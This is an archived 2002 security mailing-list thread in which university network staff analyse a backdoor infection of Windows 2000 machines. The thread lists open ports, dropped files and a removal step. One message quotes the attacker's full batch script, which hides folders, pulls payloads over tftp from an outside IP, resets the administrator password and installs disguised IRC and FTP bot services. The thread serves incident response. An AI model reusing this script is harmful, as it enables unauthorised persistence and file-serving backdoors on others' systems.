[unisog] Re: Coordinated Scan

Mark Newman mnx at utk.edu
Wed Apr 3 15:06:35 GMT 2002


Anyone found a conclusive writeup on this?

Mark Newman
University of Tennessee

On Monday 01 April 2002 09:48 am, Jeff Bollinger wrote:
> More on this attack.  Here is the actual .bat file used by the attacker
> which gives some great clues:
>
> ----
>
> @echo off
> c:
> cd c:\winnt\system32\vmn32
> mkdir \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
> attrib +s +r +h \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
> kill sxe*
> kill temp.exe
> del ..\2*.ocx
> del ..\32*.ocx
> del ..\temp2.exe
> PATH=%PATH%;c:\winnt\system32
> move firedaem.exe firedaemon.exe
> del c:\winnt\system32\vmn32.exe
> attrib *.* -r /s
> attrib +s +h +r c:\winnt\system32\vmn32
> attrib c:\winnt\system32\vmn32\asp +s +h
> attrib c:\winnt\system32\vmn32\aspc +s +h
> tftp -i 12.233.26.173 GET ir2.conf c:\winnt\system32\vmn32\asp\ir.conf
> tftp -i 12.233.26.173 GET xir.conf c:\winnt\system32\vmn32\aspc\ir.conf
> tftp -i 12.233.26.173 GET barm8.gif c:\winnt\system32\vmn32\barm8.gif
> attrib *.* -r /s
> net user administrator changem
> net share /delete ipc$
> SET MXHOME=c:\winnt\system32\vmn32
> SET MXBIN=c:\winnt\system32\vmn32
> c:\winnt\system32\vmn32\firedaemon -i Ms32dll "c:\winnt\system32\vmn32"
> "c:\winnt\system32\vmn32\lsass.exe" "c:\winnt\system32\vmn32\barm8.gif" Y 0
> 0 Y Y
> c:\winnt\system32\vmn32\firedaemon -i SVHOST "c:\winnt\system32\vmn32\asp"
> "c:\winnt\system32\vmn32\asp\SVHOST.EXE"
> "c:\winnt\system32\vmn32\asp\ir.conf" Y 0 0 Y Y
> c:\winnt\system32\vmn32\firedaemon -i MSVC5  "c:\winnt\system32\vmn32\aspc"
> "c:\winnt\system32\vmn32\aspc\SVHOST.EXE"
> "c:\winnt\system32\vmn32\aspc\ir.conf" Y 0 0 Y Y
> c:\winnt\system32\vmn32\services start Ms32dll
> c:\winnt\system32\vmn32\services start SVHOST
> c:\winnt\system32\vmn32\services start MSVC5
> echo REGEDIT4  1>>root.reg
> echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> root.reg
> echo "restrictanonymous"="1" >> root.reg
> echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> root.reg
> echo "NTLM"="2" >> root.reg
> regedit /S root.reg
> del root.reg
> services stop tlntsvr
> services delete tlntsvr
> services stop lmhosts
> services start lmhosts
> services start NtLmSsp
> services stop PSEXESVC
> services delete PSEXESVC
>
> Allen Chang wrote:
> > Apologies if I break the thread...
> >
> > Here's my analysis of the compromised computers. First of all, this is
> > not the Backdoor.darkIRC detected by antivirus programs. This backdoor is
> > not detected by the latest NAV patterns.
> >
> > I'm guessing that these computer were compromised through the
> > administrative share with no administrator password on Windows 2000.
> >
> > *A rouge lsass.exe (with a red u and a smaller green d icon) was
> > installed as a service using firedaemon.exe (or firedaem.exe). You can
> > check for it under Administrative Tools -> Services. The one on our hosts
> > was called ms32dll *Several .tmp files and a rudl32.exe are dropped in
> > the Startup folder but the .tmp  files don't seem to run.
> > *Serve-U FTP, IRC and telnet servers are run on various ports. The IRC
> > configurations(ir.con) seem to indicate that they are set up as XDCC
> > file-serving bots.
> >
> > Judging from this, one should be able to remove the service with a
> > "firedaemon -u ms32dll" This seems to close all the opened ports but I am
> > unsure as to what other damage may have been done.
> >
> > On all the hosts, nmap found the following ports open:
> > Port       State       Service
> > 132/tcp    open        cisco-sys <--tlntsvr.exe (telnet)
> > 135/tcp    open        loc-srv <--svchost.exe
> > 139/tcp    open        netbios-ssn <--NetBIOS sharing (normal)
> > 445/tcp    open        microsoft-ds <-Windows sharing (kind of normal)
> > 1025/tcp   open        listen <--mstask.exe (normal)
> > 8888/tcp   open        sun-answerbook <-- sxe5.tmp (backdoor client)
> >
> > Running Vision 1.0 (www.foundstone.com) on the compromised computers
> > yielded these additional ports and programs bound to them:
> > 1029/tcp  <-- sxe5.tmp
> > 1031/tcp <-- sxe5.tmp
> > 43958/tcp <--c:\winnt\system32\vmn32\lsass.exe <-not to be confused with
> > the other lsass.exe from MS
> > 3112/tcp <-- c:\winnt\system32\vmn32\lsass.exe
> >
> > According to vmn\ServUStartUpLog.txt (Not confirmed)
> > 3112 <-- ftp
> >
> > Hidden? (Never seen by me)
> > 99/tcp <-- Backdoor command shell?
> >
> > (**Files Found**)
> > C:\Documents and Settings\All Users\Start Menu\Programs\Startup
> > rudl32.exe
> > sxe3.tmp
> > sxe4.tmp
> > sxe5.tmp
> >
> > Other files mentioned at
> > http://www.theorygroup.com/Archive/Unisog/2002/msg00334.html
> >
> > @llen
> > Network Security
> > Office of Residential Computing
> > UC Berkeley



More information about the unisog mailing list